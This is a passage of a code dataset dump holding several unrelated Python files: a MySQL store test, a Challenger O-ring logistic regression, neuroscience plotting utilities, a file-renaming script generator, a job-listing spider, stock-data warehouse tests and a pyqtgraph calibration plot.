distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n##\n\n\"\"\"\nTests for :mod:`ranger-ims-server.store.mysql._store`\n\"\"\"\n\nfrom os import environ\nfrom typing import List, Optional, cast\n\nfrom twisted.internet.defer import ensureDeferred\nfrom twisted.logger import Logger\n\nfrom .base import TestDataStore\nfrom .service import MySQLService\nfrom ...test.base import (\n DataStoreTests as SuperDataStoreTests, TestDataStoreABC\n)\nfrom ...test.event import DataStoreEventTests as SuperDataStoreEventTests\nfrom ...test.incident import (\n DataStoreIncidentTests as SuperDataStoreIncidentTests\n)\nfrom ...test.report import (\n DataStoreIncidentReportTests as SuperDataStoreIncidentReportTests\n)\nfrom ...test.street import (\n DataStoreConcentricStreetTests as SuperDataStoreConcentricStreetTests\n)\nfrom ...test.type import (\n DataStoreIncidentTypeTests as SuperDataStoreIncidentTypeTests\n)\n\n\n__all__ = ()\n\n\n\nif environ.get(\"IMS_TEST_MYSQL_HOST\", None) is None:\n from .service import DockerizedMySQLService\n\n def mysqlServiceFactory() -> MySQLService:\n return DockerizedMySQLService()\nelse:\n from .service import ExternalMySQLService\n\n def mysqlServiceFactory() -> MySQLService:\n env = environ.get\n return ExternalMySQLService(\n host=cast(str, env(\"IMS_TEST_MYSQL_HOST\")),\n port=int(env(\"IMS_TEST_MYSQL_PORT\", \"3306\")),\n user=env(\"IMS_TEST_MYSQL_USERNAME\", \"ims\"),\n password=env(\"IMS_TEST_MYSQL_PASSWORD\", \"\"),\n rootPassword=env(\"IMS_TEST_MYSQL_ROOT_PASSWORD\", \"\"),\n )\n\n\nclass DataStoreTests(SuperDataStoreTests):\n \"\"\"\n Parent test class.\n \"\"\"\n\n log = Logger()\n\n skip: Optional[str] = None\n\n mysqlService: MySQLService = mysqlServiceFactory()\n\n\n def setUp(self) -> None:\n async def setUp() -> None:\n self.stores: List[TestDataStore] = []\n\n await self.mysqlService.start()\n\n # setUp can't return a coroutine, so convert it to a Deferred\n return ensureDeferred(setUp())\n\n\n def tearDown(self) -> None:\n async def tearDown() -> None:\n for store in self.stores:\n await store.disconnect()\n\n # setUp can't return a coroutine, so convert it to a Deferred\n return ensureDeferred(tearDown())\n\n\n async def store(self) -> TestDataStoreABC:\n service = self.mysqlService\n\n assert service.host is not None\n assert 
service.port is not None\n\n name = await service.createDatabase()\n\n store = TestDataStore(\n self,\n hostName=service.host,\n hostPort=service.port,\n database=name,\n username=service.user,\n password=service.password,\n )\n await store.upgradeSchema()\n\n self.stores.append(store)\n\n return cast(TestDataStoreABC, store)\n\n\n\nclass DataStoreEventTests(DataStoreTests, SuperDataStoreEventTests):\n \"\"\"\n Tests for :class:`DataStore` event access.\n \"\"\"\n\n\n\nclass DataStoreIncidentTests(DataStoreTests, SuperDataStoreIncidentTests):\n \"\"\"\n Tests for :class:`DataStore` incident access.\n \"\"\"\n\n\n\nclass DataStoreIncidentReportTests(\n DataStoreTests, SuperDataStoreIncidentReportTests\n):\n \"\"\"\n Tests for :class:`DataStore` incident report access.\n \"\"\"\n\n\n\nclass DataStoreConcentricStreetTests(\n DataStoreTests, SuperDataStoreConcentricStreetTests\n):\n \"\"\"\n Tests for :class:`DataStore` concentric street access.\n \"\"\"\n\n\n\nclass DataStoreIncidentTypeTests(\n DataStoreTests, SuperDataStoreIncidentTypeTests\n):\n \"\"\"\n Tests for :class:`DataStore` incident type access.\n \"\"\"\n","sub_path":"src/ims/store/mysql/test/test_store.py","file_name":"test_store.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"409432733","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n탐색 기말고사 코\r\n\"\"\"\r\n\r\n# 1.library 선언\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom statsmodels.formula.api import glm\r\nfrom statsmodels.genmod.families import Binomial\r\n\r\n# 2.데이터 불러오기\r\nchallenger = pd.read_csv(\"C:/Users/ghkdu/Downloads/challenger_data.csv\")\r\n\r\n# 3.요약 테이블 생성\r\ndf = pd.DataFrame()\r\ndf['temp'] = np.unique(challenger.Temperature)\r\ndf['failed'] = 0\r\ndf['ok'] = 0\r\ndf['total'] = 0\r\ndf.index = df.temp.values\r\n\r\n# 4.온도별 이륙 성공여부 체크\r\nfor ii in range(challenger.shape[0]):\r\n curTemp = challenger.Temperature[ii]\r\n curVal = challenger.Incident[ii]\r\n df.loc[curTemp,'total'] += 1\r\n if curVal == 1:\r\n df.loc[curTemp, 'failed'] += 1\r\n else:\r\n df.loc[curTemp, 'ok'] += 1 \r\n\r\n# 5.로지스틱 모델링\r\nmodel = glm(\"failed ~ temp\", data = df, family = Binomial()).fit()\r\nprint(model.summary())\r\n\r\n# 6.로지스틱 모델 플롯\r\nfig = plt.figure()\r\nsns.lmplot(x = \"Temperature\", y = \"Incident\", data = challenger, logistic = True)\r\nplt.title(\"Defects of the Space Shuttle O-Rings vs temperatue\", position = (0.5, 1.0+0.05), fontsize = 15)\r\nplt.xlabel('Outside Temperature[F]')\r\nplt.ylabel('Demage Incident')","sub_path":"기말고사 코드.py","file_name":"기말고사 코드.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"127416349","text":"import os\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef get_container_plots_dir():\n return r'//allen/programs/braintv/workgroups/nc-ophys/visual_behavior/qc_plots/container_plots'\n\ndef get_session_plots_dir():\n return r'//allen/programs/braintv/workgroups/nc-ophys/visual_behavior/qc_plots/session_plots'\n\ndef get_experiment_plots_dir():\n return r'//allen/programs/braintv/workgroups/nc-ophys/visual_behavior/qc_plots/experiment_plots'\n\ndef get_single_cell_plots_dir():\n return r'//allen/programs/braintv/workgroups/nc-ophys/visual_behavior/qc_plots/single_cell_plots'\n\n\ndef save_figure(fig, figsize, save_dir, 
folder, fig_title, formats=['.png']):\n fig_dir = os.path.join(save_dir, folder)\n if not os.path.exists(fig_dir):\n os.mkdir(fig_dir)\n filename = os.path.join(fig_dir, fig_title)\n mpl.rcParams['pdf.fonttype'] = 42\n fig.set_size_inches(figsize)\n for f in formats:\n fig.savefig(filename + f, transparent=True, orientation='landscape', bbox_inches='tight', dpi=300, facecolor=fig.get_facecolor())\n\n\ndef get_colors_for_session_numbers():\n reds = sns.color_palette('Reds_r', 6)[:5][::2]\n blues = sns.color_palette('Blues_r', 6)[:5][::2]\n return reds + blues\n\n\ndef lighter(color, percent):\n color = np.array(color)\n white = np.array([255, 255, 255])\n vector = white - color\n return color + vector * percent\n\n\ndef get_session_type_color_map():\n colors = np.floor(np.array([list(x) for x in get_colors_for_session_numbers()]) * 255).astype(np.uint8)\n black = np.array([0, 0, 0]).astype(np.uint8)\n\n session_type_color_map = {\n 'OPHYS_0_images_A_habituation': lighter(colors[0, :], 0.8),\n 'OPHYS_1_images_A': colors[0, :],\n 'OPHYS_2_images_A_passive': colors[1, :],\n 'OPHYS_3_images_A': colors[2, :],\n 'OPHYS_4_images_B': colors[3, :],\n 'OPHYS_5_images_B_passive': colors[4, :],\n 'OPHYS_6_images_B': colors[5, :],\n\n 'OPHYS_1_images_B': colors[3, :],\n 'OPHYS_2_images_B_passive': colors[4, :],\n 'OPHYS_3_images_B': colors[5, :],\n 'OPHYS_4_images_A': colors[0, :],\n 'OPHYS_5_images_A_passive': colors[1, :],\n 'OPHYS_6_images_A': colors[2, :],\n\n 'OPHYS_0_images_G_habituation': lighter(colors[3, :], 0.8),\n 'OPHYS_1_images_G': colors[3, :],\n 'OPHYS_2_images_G_passive': colors[4, :],\n 'OPHYS_3_images_G': colors[5, :],\n 'OPHYS_4_images_H': colors[0, :],\n 'OPHYS_5_images_H_passive': colors[1, :],\n 'OPHYS_6_images_H': colors[2, :],\n\n 'OPHYS_7_receptive_field_mapping': lighter(black, 0.5),\n 'None': black,\n None: black,\n np.nan: black,\n 'VisCodingTargetedMovieClips': lighter(black, 0.5),\n 'full_field_test': lighter(black, 0.2)}\n\n return session_type_color_map\n\n\ndef get_location_color(location, project_code):\n colors = sns.color_palette()\n if (project_code == 'VisualBehavior') or (project_code == 'VisualBehaviorTask1B'):\n location_colors = {'Slc17a7_VISp_175': colors[9],\n 'Slc17a7_VISp_375': colors[0],\n 'Vip_VISp_175': colors[4],\n 'Sst_VISp_275': colors[2],\n 'Sst_VISp_290': colors[2]}\n\n elif (project_code == 'VisualBehaviorMultiscope') or (project_code == 'VisualBehaviorMultiscope4areasx2d'):\n location = location.split('_')\n location = location[0] + '_' + location[1]\n location_colors = {'Slc17a7_VISp': sns.color_palette('Blues_r', 5)[0],\n 'Slc17a7_VISl': sns.color_palette('Blues_r', 5)[1],\n 'Slc17a7_VISal': sns.color_palette('Blues_r', 5)[2],\n 'Slc17a7_VISam': sns.color_palette('Blues_r', 5)[3],\n 'Slc17a7_VISpm': sns.color_palette('Blues_r', 5)[4],\n 'Vip_VISp': sns.color_palette('Purples_r', 5)[0],\n 'Vip_VISl': sns.color_palette('Purples_r', 5)[1],\n 'Vip_VISal': sns.color_palette('Purples_r', 5)[2],\n 'Vip_VISam': sns.color_palette('Purples_r', 5)[3],\n 'Vip_VISpm': sns.color_palette('Purples_r', 5)[4],\n 'Sst_VISp': sns.color_palette('Greens_r', 5)[0],\n 'Sst_VISl': sns.color_palette('Greens_r', 5)[1],\n 'Sst_VISal': sns.color_palette('Greens_r', 5)[2],\n 'Sst_VISam': sns.color_palette('Greens_r', 5)[3],\n 'Sst_VISpm': sns.color_palette('Greens_r', 5)[4]}\n\n return location_colors[location]\n\n\n# def lighter(color, percent):\n# color = color * 255\n# color = np.array(color)\n# white = np.array([255, 255, 255])\n# return color + (white * 
percent)\n#\n\ndef make_color_transparent(rgb_color, background_rgb=[255, 255, 255], alpha=0.5):\n return [alpha * c1 + (1 - alpha) * c2\n for (c1, c2) in zip(rgb_color, background_rgb)]\n\ndef placeAxesOnGrid(fig, dim=[1, 1], xspan=[0, 1], yspan=[0, 1], wspace=None, hspace=None, sharex=False, sharey=False):\n '''\n Takes a figure with a gridspec defined and places an array of sub-axes on a portion of the gridspec\n\n Takes as arguments:\n fig: figure handle - required\n dim: number of rows and columns in the subaxes - defaults to 1x1\n xspan: fraction of figure that the subaxes subtends in the x-direction (0 = left edge, 1 = right edge)\n yspan: fraction of figure that the subaxes subtends in the y-direction (0 = top edge, 1 = bottom edge)\n wspace and hspace: white space between subaxes in vertical and horizontal directions, respectively\n\n returns:\n subaxes handles\n '''\n import matplotlib.gridspec as gridspec\n\n outer_grid = gridspec.GridSpec(100, 100)\n inner_grid = gridspec.GridSpecFromSubplotSpec(dim[0], dim[1],\n subplot_spec=outer_grid[int(100 * yspan[0]):int(100 * yspan[1]),\n # flake8: noqa: E999\n int(100 * xspan[0]):int(100 * xspan[1])], wspace=wspace,\n hspace=hspace) # flake8: noqa: E999\n\n # NOTE: A cleaner way to do this is with list comprehension:\n # inner_ax = [[0 for ii in range(dim[1])] for ii in range(dim[0])]\n inner_ax = dim[0] * [dim[1] * [\n fig]] # filling the list with figure objects prevents an error when it they are later replaced by axis handles\n inner_ax = np.array(inner_ax)\n idx = 0\n for row in range(dim[0]):\n for col in range(dim[1]):\n if row > 0 and sharex == True:\n share_x_with = inner_ax[0][col]\n else:\n share_x_with = None\n\n if col > 0 and sharey == True:\n share_y_with = inner_ax[row][0]\n else:\n share_y_with = None\n\n inner_ax[row][col] = plt.Subplot(fig, inner_grid[idx], sharex=share_x_with, sharey=share_y_with)\n fig.add_subplot(inner_ax[row, col])\n idx += 1\n\n inner_ax = np.array(inner_ax).squeeze().tolist() # remove redundant dimension\n return inner_ax\n\n\n\ndef plot_flashes_on_trace(ax, timestamps, change=None, omitted=False, alpha=0.15, facecolor='gray'):\n \"\"\"\n plot stimulus flash durations on the given axis according to the provided timestamps\n \"\"\"\n stim_duration = 0.2502\n blank_duration = 0.5004\n change_time = 0\n start_time = timestamps[0]\n end_time = timestamps[-1]\n interval = (blank_duration + stim_duration)\n # after time 0\n if omitted:\n array = np.arange((change_time + interval), end_time, interval)\n else:\n array = np.arange(change_time, end_time, interval)\n for i, vals in enumerate(array):\n amin = array[i]\n amax = array[i] + stim_duration\n ax.axvspan(amin, amax, facecolor=facecolor, edgecolor='none', alpha=alpha, linewidth=0, zorder=1)\n if change == True:\n alpha = alpha * 3\n else:\n alpha\n # before time 0\n array = np.arange(change_time, start_time - interval, -interval)\n array = array[1:]\n for i, vals in enumerate(array):\n amin = array[i]\n amax = array[i] + stim_duration\n ax.axvspan(amin, amax, facecolor=facecolor, edgecolor='none', alpha=alpha, linewidth=0, zorder=1)\n return ax\n","sub_path":"visual_behavior/visualization/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"548735647","text":"# External expectations: \n# - A list of all files in *one* of the size directories (e.g., mcsize__16)\n# - Just us an 'ls mcsize__16 > old_list.txt'\n# - Expected to be 
saved as \"old_list.txt\", otherwise change first with statement below\n\n# Length of genome in orginal data\nold_length = 400 \nnew_length = 100 # Change me for each genome size!\n# Organism sizes for which the script should prep timing data\nsize_list = [8, 16, 32, 64, 128, 256, 512]\n\n# Automatically calcluated variables\nold_threshold = int(old_length) * 0.6\nnew_threshold = int(new_length) * 0.6\nmin_val = old_threshold - new_threshold\nmax_val = old_threshold + (new_length - new_threshold)\n\n# All removes must come before all moves\nrm_list = []\nmv_list = []\n\nwith open('old_list.txt', 'r') as in_fp:\n with open('transfer.sh', 'w') as out_fp:\n # Each line should be in the form X.dat where X in [0, old_length]\n for line in in_fp:\n line = line.strip()\n if line == '':\n continue\n # Extract the number and calculate what it should move to in order to \n # preserve the orginial restraint buffer value\n # e.g., 270 in a 400-bit genome has a restraint buffer value of 10 (270 - 260 = 10)\n # Thus, for a 200-bit genome it would move to 120 + 10 = 130 \n val = int(line.split('.')[0])\n old_diff = val - old_threshold\n new_val = old_diff + new_threshold\n # If it's within the range of the new genome length, add it\n if new_val >= 0 and new_val <= new_length:\n mv_list.append([val, new_val])\n else: # Else, remove it\n rm_list.append(val)\n\n # Create a bash script to move and delete all files as needed\n out_fp.write('#!/bin/bash\\n')\n for size in size_list:\n out_fp.write('cd mcsize__' + str(size) + '\\n')\n out_fp.write('echo \"' + str(size) + '\"\\n')\n for rm_val in rm_list:\n out_fp.write('rm ' + str(rm_val) + '.dat \\n')\n for mv_pair in mv_list:\n out_fp.write('mv ' + str(mv_pair[0]) + '.dat ' + str(mv_pair[1]) + '.dat\\n')\n out_fp.write('cd ..\\n')\n \n\n","sub_path":"experiments/2021_03_04__genome_length_control/helper_scripts/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"116873880","text":"# -*- coding: utf-8 -*-\n\"\"\"This file is a FriendlyHouse spider created on top of the ATSSpider\nscrapy crawl friendlyhouse -a mining_job_id=9999 -a iteration=1 -a url=\"https://friendlyhouse.org/\"\n\nsample url:\n https://friendlyhouse.org/\n\"\"\"\n\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, HtmlFormatter, md5_hash\n\n\nclass FriendlyHouse(ATSSpider):\n\n name = 'friendlyhouse'\n logo_url = ''\n\n def parse(self, response):\n sel = Selector(response)\n if not self.logo_url:\n logo = sel.xpath('//div[@class=\"header-logo\"]/a/img/@src').extract()\n self.logo_url = logo if logo else ''\n\n jobs_url = sel.xpath('//a[text()=\"Jobs Listing\"]/@href').extract()\n if jobs_url:\n yield Request(\n jobs_url[0], callback=self.parse_job_callback(),\n headers={\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Connection': 'keep-alive'\n }\n )\n\n def parse_job(self, response):\n sel = Selector(text=response.body, type=\"xml\")\n jobs = sel.xpath('//div[@class=\"job job even\"]')\n for job in jobs:\n job_url = job.xpath('.//tr[th[text()=\"Title\"]]/td/a/@href').extract()\n if job_url:\n loader = BrightcorpItemLoader(selector=job)\n loader.add_value('url', job_url)\n loader.add_value('logo_url', self.logo_url)\n 
loader.add_xpath('title', './/tr[th[text()=\"Title\"]]/td/a/text()')\n loader.add_value(\n 'referencenumber', response.url, md5_hash, Prefix('%s-' % self.name)\n )\n loader.add_xpath(\n 'baseSalary', './/tr[th[text()=\"Salary\"]]/td/text()'\n )\n loader.add_xpath(\n 'location', './/tr[th[text()=\"Location\"]]/td/text()'\n )\n loader.add_xpath(\n 'description', './/tr[th[text()=\"Job Information\"]]', HtmlFormatter()\n )\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/friendlyhouse.py","file_name":"friendlyhouse.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"449796297","text":"\"\"\"Test dataset for experiment: data schema and data warehouse functionality.\"\"\"\n\nimport pytest\n\n\ndef test_load_universe_of_companies():\n \"\"\"Test reading data from Excel file that contain company directory and quantitave variables in different sheets.\n \n Universe of Companies\nThe information about companies are in the first sheet. This is loaded into data frame and is inserted into table.\n\nThe file SET100_Data.xlsm is the master list of all companies in the universe.\n \"\"\"\n from experiment import os, np, pd, pdr, plt, datetime\n import datetime as dt\n import xlrd\n # First sheet list all companies\n # VO sheet contains VO data\n\n # Row 3 LOC; Row 4 Datatype Row 5 Name\n os.chdir(os.environ['DATA_HOME'] + '/Datastream')\n\n sheets = pd.read_excel('SET100_Data.xlsm', sheet_name=[0,'VO','MV','P','MACD']) \n sheets.keys()\n\n \ndef test_set100_company_dim():\n \"\"\"The company dimension table should contain 160 companies. There are 163 symbols and 3 were duplicates.\"\"\"\n from experiment import os, np, pd\n os.chdir(os.environ['DATA_HOME'] + '/Datastream')\n \n sheets = pd.read_excel('SET100_Data.xlsm', sheet_name=[0])\n \n # List of ticker symbols\n symbols = list(sheets[0]['Symbol In SET100 Constituent'].values)\n \n # Data frame\n df_tickers = sheets[0][['Symbol In SET100 Constituent', 'Company Name', 'Datastream Mnemonic', 'Remark']]\n df_tickers # All 163 stock symbols\n \n # The 160 companies\n df_companies = df_tickers[df_tickers['Datastream Mnemonic'].notnull()]\n df_companies\n \n # The SET100 companies with the sector\n sector_lookup = os.path.join(os.environ['EXPERIMENT_HOME'],\"\"\"1.0 Data Acquisition/stock_ticker.csv\"\"\")\n sector_lookup = pd.read_csv(sector_lookup)\n\n set100_companies = df_companies[['Symbol In SET100 Constituent', 'Company Name', 'Datastream Mnemonic']]\n set100_companies\n\n # Join\n df = set100_companies.merge(sector_lookup, left_on='Symbol In SET100 Constituent', right_on='symbol')\n df['localCode'] = 'TH:'+df['symbol']\n df\n \n # This last dataframe is the 'set100_company_dim' table.\n ### END TEST ###\n \n \ndef test_load_dataset_for_experiment():\n \"\"\"Check datababse connection. Load stock symbols. 
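    A minimal sketch of the connection check done below -- the DSN follows
    the pattern postgresql://user:password@host:port/dbname, and the generic
    credentials here are placeholders, not the real test-environment ones:

        from sqlalchemy import create_engine
        engine = create_engine('postgresql://user:pass@localhost:5432/stockdb')
        with engine.connect() as conn:
            pass   # raises if the database is unreachable (driver required)
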
Get sample data frame for experiment.\"\"\"\n \n from dataset import get_dataset_db\n \n from dataset import shapshot\n the_conn = shapshot.SET100_db_engine()\n dataset_db = get_dataset_db()\n \n \n from sqlalchemy import create_engine\n engine = create_engine('postgresql://datauser:1234@172.18.0.1:5432/stockdb', echo=False)\n assert the_conn == engine\n dataset_db = engine\n \n ","sub_path":"tests/test_data_warehouse.py","file_name":"test_data_warehouse.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"454473365","text":"# bchhun, {2019-09-18}\n\nfrom recOrder.base import VisualizeBase\n\n# import matplotlib\n# matplotlib.use('TkAgg')\n# import matplotlib.pyplot as plt\n# plt.ion()\nimport numpy as np\nimport pyqtgraph as pg\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtCore import QProcess, pyqtSlot, pyqtSignal\nfrom recOrder.base.utils.QThreader import Processor, ChildProcWithPipes, Processor\n# from multiprocessing import Pipe, Process, Queue\nfrom recOrder.base.utils import QMultiThreader\n\n\nclass RecorderCalibrationGraphController(VisualizeBase):\n\n to_graph = pyqtSignal(object)\n\n def __init__(self):\n super().__init__()\n self.graph = None\n\n @VisualizeBase.receiver(channel=20)\n def new_calibration_plot(self, value):\n self.graph = RecorderCalibrationGraph()\n self.to_graph.connect(self.graph.from_gui)\n\n @VisualizeBase.receiver(channel=4)\n def update(self, value):\n self.graph.show()\n self.to_graph.emit(value)\n\n\nclass RecorderCalibrationGraph(QtWidgets.QMainWindow):\n \"\"\"\n multiple plot axis as by:\n https://github.com/pyqtgraph/pyqtgraph/blob/develop/examples/MultiplePlotAxes.py\n \"\"\"\n\n def __init__(self):\n super(RecorderCalibrationGraph, self).__init__()\n\n # ==============\n # Multiplot, Multi-axis graph init\n # ==============\n\n self.pw = pg.PlotWidget(title=\"LC calibration graph\")\n self.pw.setLabel('bottom', \"frame\")\n self.pw.showGrid(x=True, y=True, alpha=0.5)\n self.setCentralWidget(self.pw)\n\n self.pi_int = self.pw.plotItem\n self.pi_int.setLabel('left', \"Intensity\")\n self.pi_int.showGrid(x=True, y=True, alpha=0.5)\n\n # create a new ViewBox, link the right axis to its coordinate system\n self.vb_lca = pg.ViewBox()\n self.pi_int.showAxis('right')\n self.pi_int.scene().addItem(self.vb_lca)\n self.pi_int.getAxis('right').linkToView(self.vb_lca)\n self.vb_lca.setXLink(self.pi_int)\n self.pi_int.getAxis('right').setLabel('LC value', color='w')\n\n # # create third ViewBox.\n # # this time we need to create a new axis as well.\n # self.p_lcb = pg.ViewBox()\n # # ax3 = pg.AxisItem('right')\n # # self.p_int.layout.addItem(ax3, 2, 3)\n # self.p_int.scene().addItem(self.p_lcb)\n # # ax3.linkToView(self.p_lcb)\n # self.p_int.getAxis('right').linkToView(self.p_lcb)\n # self.p_lcb.setXLink(self.p_int)\n # # ax3.setZValue(-10000)\n # # ax3.setLabel('axis 3', color='#ff0000')\n\n self._update_views()\n self.pi_int.vb.sigResized.connect(self._update_views)\n\n # ==============\n # Data init\n # ==============\n\n # pre-allocate ranges\n self.int_x_sample = [0]\n self.int_y_value = [0]\n\n self.lc_x_sample = [0]\n self.lca_y_sample = [0]\n self.lcb_y_sample = [0]\n\n leg = self.pi_int.addLegend()\n self.pi_int_plot = self.pi_int.plot(x=self.int_x_sample, y=self.int_y_value, pen=pg.mkPen(color='w'), name=\"Intensity\")\n self.lca_data = pg.PlotCurveItem(pen=pg.mkPen(color='b', width=1), name='LCA')\n self.lcb_data = pg.PlotCurveItem(pen=pg.mkPen(color='g', 
width=1), name='LCB')\n self.vb_lca.addItem(self.lca_data)\n # self.p_lcb.addItem(self.lcb_data)\n self.vb_lca.addItem(self.lcb_data)\n leg.addItem(self.lca_data, name='LCA')\n leg.addItem(self.lcb_data, name='LCB')\n\n self.int_x_current = 0\n self.lc_x_current = 0\n\n # create a legend\n # leg = pg.LegendItem((100, 60), offset=(70,30))\n # leg.setParentItem(self.p_int_plot.graphicsItem())\n # c1 = self.p_int_plot.plot([1, 3, 2, 4], pen='r', symbol='o', symbolPen='r', symbolBrush=0.5, name='red plot')\n # c2 = self.p_int_plot.plot([2, 1, 4, 3], pen='g', fillLevel=0, fillBrush=(255, 255, 255, 30), name='green plot')\n # leg.addItem(c1, 'red plot')\n # leg.addItem(c2, 'green plot')\n\n self.markers = []\n\n self.show()\n\n def _update_views(self):\n # view has resized; update auxiliary views to match\n self.vb_lca.setGeometry(self.pi_int.vb.sceneBoundingRect())\n # self.p_lcb.setGeometry(self.p_int.vb.sceneBoundingRect())\n\n # need to re-update linked axes since this was called\n # incorrectly while views had different shapes.\n # (probably this should be handled in ViewBox.resizeEvent)\n self.vb_lca.linkedViewChanged(self.pi_int.vb, self.vb_lca.XAxis)\n # self.p_lcb.linkedViewChanged(self.p_int.vb, self.p_lcb.XAxis)\n\n @pyqtSlot(object)\n def from_gui(self, value):\n\n if type(value) == tuple:\n self.lc_x_current = self.lc_x_current + 1\n\n lca = value[0]\n lcb = value[1]\n # self.lca_y_sample[self.lc_x_current] = lca\n # self.lcb_y_sample[self.lc_x_current] = lcb\n self.lca_y_sample = self.lca_y_sample + [lca]\n self.lcb_y_sample = self.lcb_y_sample + [lcb]\n\n self.lc_x_sample = self.lc_x_sample + [self.lc_x_current]\n elif type(value) == str:\n self.insert_x_marker(value)\n else:\n self.int_x_current = self.int_x_current + 1\n\n self.int_y_value = self.int_y_value + [np.mean(value)]\n self.int_x_sample = self.int_x_sample + [self.int_x_current]\n # elif type(value) == str:\n # self.insert_x_marker(value)\n\n self.update_plot()\n self._update_views()\n\n def update_plot(self):\n self.pi_int_plot.setData(np.asarray(self.int_x_sample), np.asarray(self.int_y_value))\n self.lca_data.setData(np.asarray(self.lc_x_sample), np.asarray(self.lca_y_sample))\n self.lcb_data.setData(np.asarray(self.lc_x_sample), np.asarray(self.lcb_y_sample))\n\n def insert_x_marker(self, label_):\n\n mark = pg.PlotCurveItem(pen=pg.mkPen(color='y', width=2), name=label_)\n self.vb_lca.addItem(mark)\n\n y_data = [-0.1, 0.1]\n x_data = [self.int_x_current, self.int_x_current]\n mark.setData(x_data, y_data)\n\n self.markers.append(mark)\n\n\n\n#========================================================================================================\n\n#\n# class RecorderCalibrationDisplay(VisualizeBase):\n#\n# def __init__(self):\n# super().__init__()\n# self.x_sample = None\n# self.y_value = None\n# self.process = None\n#\n# @VisualizeBase.receiver(channel=20)\n# def new_calibration_plot(self, param):\n# # self.process = QProcess()\n# # self.setupProcess()\n# self._build_display()\n#\n# def setupProcess(self):\n# # Set the channels\n# self.process.setProcessChannelMode(QProcess.MergedChannels)\n#\n# self._build_display()\n#\n# # Run the process with a given command\n# self.process.start(\"df -h\")\n# # self._build_display()\n#\n# def _build_display(self):\n# # self.__init__()\n#\n# self.data = None\n# self.x_sample = np.array([0])\n# self.y_value = np.array([0])\n#\n# self.fig, self.ax = plt.subplots()\n# self.lines, = self.ax.plot([], [], marker='o', linestyle='-')\n# self.lines.set_dashes([2,2,2,2])\n#\n# 
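# A minimal, self-contained sketch of the dual-axis pyqtgraph pattern used by
# RecorderCalibrationGraph above: one PlotItem plus an extra ViewBox that
# shares its x axis. Assumes pyqtgraph with a PyQt5 binding installed; names
# like `_sync_views` are illustrative, not part of the original module.
import pyqtgraph as pg

app = pg.mkQApp()
pw = pg.PlotWidget(title='dual-axis sketch')
left = pw.plotItem                        # primary (left) axis
right_vb = pg.ViewBox()                   # overlay view for the right axis
left.showAxis('right')
left.scene().addItem(right_vb)
left.getAxis('right').linkToView(right_vb)
right_vb.setXLink(left)                   # share the x axis with the PlotItem

left.plot([0, 1, 2, 3], [10, 20, 15, 30])                           # left curve
right_vb.addItem(pg.PlotCurveItem([0, 1, 2, 3], [0.1, 0.4, 0.2, 0.9]))  # right curve

def _sync_views():                        # keep the overlay geometry in step
    right_vb.setGeometry(left.vb.sceneBoundingRect())

left.vb.sigResized.connect(_sync_views)
_sync_views()
pw.show()
app.exec_()                               # PyQt5-style event loop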
self.ax.set(xlabel=\"frame number\", ylabel=\"intensity\",\n# title=\"mean intensity during calibration\")\n#\n# self.lines.set_xdata(self.x_sample)\n# self.lines.set_ydata(self.y_value)\n#\n# self.ax.set_autoscaley_on(True)\n# self.ax.set_ylim(0, 65536)\n#\n# self.ax.grid()\n#\n# plt.show()\n#\n# @VisualizeBase.receiver(channel=4)\n# def update(self, value):\n# # append y value\n# self.y_value = np.append(self.y_value, np.mean(value))\n#\n# # increment x sample\n# self.x_sample = np.append(self.x_sample, self.x_sample[-1]+1)\n#\n# # place new data\n# # self.ax.plot(self.x_sample, self.y_value)\n# self.lines.set_xdata(self.x_sample)\n# self.lines.set_ydata(self.y_value)\n# self.lines.set_dashes([2,2,2,2])\n#\n# self.ax.relim()\n# self.ax.autoscale_view()\n#\n# self.fig.canvas.draw()\n# self.fig.canvas.flush_events()\n# plt.show()\n\n # def __del__(self):\n # # If QApplication is closed attempt to kill the process\n # self.process.terminate()\n # # Wait for Xms and then elevate the situation to terminate\n # if not self.process.waitForFinished(10000):\n # self.process.kill()\n #\n # plt.close(fig=self.fig)\n\n#===================================================\n\n# graph\n# in init will launch itself in a new process (if below method doesn't work)\n# upon signal receipt, will show graph\n# run as daemon\n# import time\n#\n# class Graph(Process):\n#\n# def __init__(self, childpipe):\n# super().__init__()\n# self.pipe = childpipe\n# self.daemon = True\n#\n# def display(self):\n# self.data = None\n# self.x_sample = np.array([0])\n# self.y_value = np.array([0])\n#\n# self.fig, self.ax = plt.subplots()\n# self.lines, = self.ax.plot([], [], marker='o', linestyle='-')\n# self.lines.set_dashes([2,2,2,2])\n#\n# self.ax.set(xlabel=\"frame number\", ylabel=\"intensity\",\n# title=\"mean intensity during calibration\")\n#\n# self.lines.set_xdata(self.x_sample)\n# self.lines.set_ydata(self.y_value)\n#\n# self.ax.set_autoscaley_on(True)\n# self.ax.set_ylim(0, 65536)\n#\n# self.ax.grid()\n#\n# def run(self):\n# self.display()\n#\n# while True:\n# try:\n# 